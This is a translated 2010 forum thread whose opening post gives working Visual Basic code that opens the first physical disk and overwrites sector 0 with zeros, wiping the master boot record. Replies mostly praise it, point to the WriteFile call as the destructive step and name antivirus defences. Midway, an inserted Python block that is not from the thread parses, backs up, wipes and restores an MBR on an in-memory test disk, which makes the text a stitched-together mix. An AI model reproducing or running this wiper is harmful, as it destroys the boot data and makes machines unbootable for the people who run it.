[Original] Destroying the MBR on NT systems in pure VB

The following code was tested successfully on Windows XP and Windows 7 x86/x64. The principle is a direct write to the disk.

Option Explicit
' Win32 declarations used for raw access to the physical disk
Private Declare Function CreateFile Lib "kernel32.dll" Alias "CreateFileA" (ByVal lpFileName As String, ByVal dwDesiredAccess As Long, ByVal dwShareMode As Long, ByVal lpSecurityAttributes As Long, ByVal dwCreationDisposition As Long, ByVal dwFlagsAndAttributes As Long, ByVal hTemplateFile As Long) As Long
Private Declare Function SetFilePointer Lib "kernel32.dll" (ByVal hFile As Long, ByVal lDistanceToMove As Long, lpDistanceToMoveHigh As Long, ByVal dwMoveMethod As Long) As Long
Private Declare Sub RtlZeroMemory Lib "kernel32.dll" (ByVal pDestination As Long, ByVal Length As Long)
Private Declare Function ReadFile Lib "kernel32.dll" (ByVal hFile As Long, ByVal lpBuffer As Long, ByVal nNumberOfBytesToRead As Long, lpNumberOfBytesRead As Long, ByVal lpOverlapped As Long) As Long
Private Declare Function WriteFile Lib "kernel32.dll" (ByVal hFile As Long, ByVal lpBuffer As Long, ByVal nNumberOfBytesToWrite As Long, lpNumberOfBytesWritten As Long, ByVal lpOverlapped As Long) As Long
Private Declare Function CloseHandle Lib "kernel32.dll" (ByVal hObject As Long) As Long

Private Const GENERIC_READ As Long = &H80000000
Private Const GENERIC_WRITE As Long = &H40000000
Private Const FILE_SHARE_READ As Long = &H1
Private Const FILE_SHARE_WRITE As Long = &H2
Private Const OPEN_EXISTING As Long = 3
Private Const INVALID_HANDLE_VALUE As Long = (-1)
Private Const FILE_BEGIN As Long = 0

Public Function main()
    Dim hFile As Long
    Dim buffer(511) As Byte      ' one 512-byte sector; sector 0 of the disk holds the MBR
    Dim dwReadWrite As Long

    ' Open the first physical disk directly, bypassing the filesystem (needs administrator rights)
    hFile = CreateFile("\\.\PhysicalDrive0", GENERIC_READ Or GENERIC_WRITE, FILE_SHARE_READ Or FILE_SHARE_WRITE, 0, OPEN_EXISTING, 0, 0)
    If (hFile <> INVALID_HANDLE_VALUE) Then
        ' Read sector 0 into the local buffer (the data read is not used afterwards)
        Call SetFilePointer(hFile, 0, 0, FILE_BEGIN)
        Call ReadFile(hFile, VarPtr(buffer(0)), 512, dwReadWrite, 0)

        ' Zero the buffer in this process only; the disk is untouched until WriteFile
        Call SetFilePointer(hFile, 0, 0, FILE_BEGIN)
        Call RtlZeroMemory(VarPtr(buffer(0)), 512)

        ' Overwrite sector 0 with 512 zero bytes: this is the step that destroys the MBR
        Call WriteFile(hFile, VarPtr(buffer(0)), 512, dwReadWrite, 0)
        Call CloseHandle(hFile)
    End If
End Function
I'm also attaching a reference on modifying the MBR that you can consult.

Reply: Supported, no questions asked.

Reply: The MBR-tampering code runs in Ring 3; I implemented it in VB.

Reply: Absolute worship!!!
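An added example, not code from the thread or its author: the safe counterpart of the VB routine in the original post, written in Python against a constructed in-memory disk. It parses sector 0 as a classic MBR (four 16-byte partition entries at offset 0x1BE, the 0x55AA boot signature at offset 0x1FE), backs the sector up before any write, shows that zeroing the sector, which is exactly what the WriteFile call in the VB code does, leaves nothing a parser will accept as an MBR, and then restores the backup with a read-back check. The sample MBR and the io.BytesIO "disk" are constructed test data. On a real Windows machine the handle would be open(r"\\.\PhysicalDrive0", "r+b", buffering=0) run as administrator with whole-sector reads and writes; that, and the 512-byte logical sector size (4Kn disks report 4096), are assumptions noted in the code.

```python
import io
import struct

SECTOR_SIZE = 512             # assumed logical sector size; 4Kn disks report 4096
PART_TABLE_OFFSET = 0x1BE     # four 16-byte partition entries start here
SIGNATURE_OFFSET = 0x1FE      # 0x55AA boot signature
BOOT_SIGNATURE = b"\x55\xAA"
PART_ENTRY_FMT = "<B3sB3sII"  # status, CHS start, type, CHS end, LBA start, sector count


def parse_mbr(sector: bytes) -> dict:
    """Parse one sector as a classic MBR; raise ValueError if it is not one."""
    if len(sector) != SECTOR_SIZE:
        raise ValueError(f"expected {SECTOR_SIZE} bytes, got {len(sector)}")
    if sector[SIGNATURE_OFFSET:SIGNATURE_OFFSET + 2] != BOOT_SIGNATURE:
        raise ValueError("missing 0x55AA boot signature")
    partitions = []
    for i in range(4):
        start = PART_TABLE_OFFSET + 16 * i
        status, _chs_start, ptype, _chs_end, lba_start, count = struct.unpack(
            PART_ENTRY_FMT, sector[start:start + 16])
        if ptype == 0:
            continue  # empty slot
        partitions.append({"index": i, "bootable": status == 0x80, "type": ptype,
                           "lba_start": lba_start, "sectors": count})
    return {"bootstrap": sector[:PART_TABLE_OFFSET], "partitions": partitions}


def read_sector0(disk) -> bytes:
    """Read sector 0 from a raw disk handle opened in binary mode."""
    disk.seek(0)
    data = disk.read(SECTOR_SIZE)
    if len(data) != SECTOR_SIZE:
        raise IOError(f"short read: {len(data)} bytes")
    return data


def backup_mbr(disk, dest) -> bytes:
    """Copy sector 0 to a writable binary stream, refusing if it is not a valid MBR."""
    sector = read_sector0(disk)
    parse_mbr(sector)
    dest.write(sector)
    dest.flush()
    return sector


def write_sector0(disk, sector: bytes) -> bool:
    """Write a validated MBR image to sector 0 and verify it by reading it back."""
    parse_mbr(sector)  # never write something that is not an MBR
    disk.seek(0)
    disk.write(sector)
    disk.flush()
    return read_sector0(disk) == sector


def make_sample_mbr() -> bytes:
    """Constructed test data: empty bootstrap area, one active NTFS (0x07) partition."""
    entry = struct.pack(PART_ENTRY_FMT, 0x80, b"\x00" * 3, 0x07, b"\x00" * 3, 2048, 204800)
    return bytes(PART_TABLE_OFFSET) + entry + bytes(16 * 3) + BOOT_SIGNATURE


def demo() -> dict:
    """Back up, wipe the way the VB code does, and restore, on an in-memory disk."""
    # Constructed stand-in for open(r"\\.\PhysicalDrive0", "r+b", buffering=0)
    # (assumption: run as administrator on Windows; I/O in whole sectors).
    disk = io.BytesIO(make_sample_mbr())
    backup = io.BytesIO()
    backup_mbr(disk, backup)

    disk.seek(0)
    disk.write(bytes(SECTOR_SIZE))  # the destructive step: 512 zero bytes over sector 0
    try:
        parse_mbr(read_sector0(disk))
        wiped = False
    except ValueError:
        wiped = True  # no signature, no partition table: the MBR is gone

    restored = write_sector0(disk, backup.getvalue())
    return {"wiped": wiped, "restored": restored,
            "partitions": parse_mbr(read_sector0(disk))["partitions"]}


if __name__ == "__main__":
    print(demo())
```

The validation in write_sector0 is deliberate: a restore tool that will happily write any 512 bytes to sector 0 is just the wiper with a different file name, so the image is checked for the boot signature before the disk is touched and read back afterwards.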
Reply: Is this the legendary Ghost Shadow (鬼影)?!??!!

Reply: It can boot from the MBR!?

Reply (oopww, last edited 2010-7-25 18:46): Assembly code for this has existed for ages... something called Red Eye (红眼睛). It just wasn't R3 like you say!!!!

Reply, quoting oopww (posted 2010-7-25 18:42):
> Assembly code for this has existed for ages... something called Red Eye (红眼睛).
> It just wasn't R3 like you say!!!!
CreateFileA + WriteFile.

Reply: As for what the consequences of this code are, I won't say. Practice brings true knowledge; just test it on a real machine yourself.
PS: Anyone who really tests it on a real machine is an absolute idiot.

Reply: Once again worshipping the TA guru.

Reply, quoting 本网站最菜的人 (posted 2010-7-25 21:32):
> Once again worshipping the TA guru.
Stop saying these hollow things all the time...

Reply (xiaoly99): No need to test it. The moment you see "RtlZeroMemory" you know what will happen. Truly evil.......

Reply (xiaoly99): Actually, if you just comment out the Call to WriteFile, it won't have this consequence.

Reply, quoting xiaoly99 (posted 2010-7-26 19:51):
> No need to test it. The moment you see "RtlZeroMemory" you know what will happen.
> Truly evil.......
RtlZeroMemory only clears the values of the buffer array in this process; that step hasn't destroyed the MBR yet...

Reply, quoting xiaoly99 (posted 2010-7-26 19:52):
> Actually, if you just comment out the Call to WriteFile, it won't have this consequence.
Obviously...

Reply (364589886): This method won't necessarily succeed... for example, after installing certain antivirus software, or some kind of system-restore software... those usually protect sector 0.

Reply to #19 364589886: Obviously... of course it only works when there's no antivirus...

Reply: Any old SSDT hook can block Ring 3 from writing the MBR.

Reply (opboy45): A question for the OP~ So it can destroy it~ Can it be repaired?

Reply to opboy45's post (Tesla.Angela): Just back it up before destroying it... It's only writing 512 bytes after all...

Reply to Tesla.Angela's post (opboy45): That's right~ Hehe~ Thanks, OP~

Reply: Thanks for sharing.

Reply: There used to be a tool for searching for MBR trojans; I tested it in a virtual machine back then. Anyway, every time it started up it showed a line of English and I just left it there. I wonder if it can still be found.

Reply: Learning from this.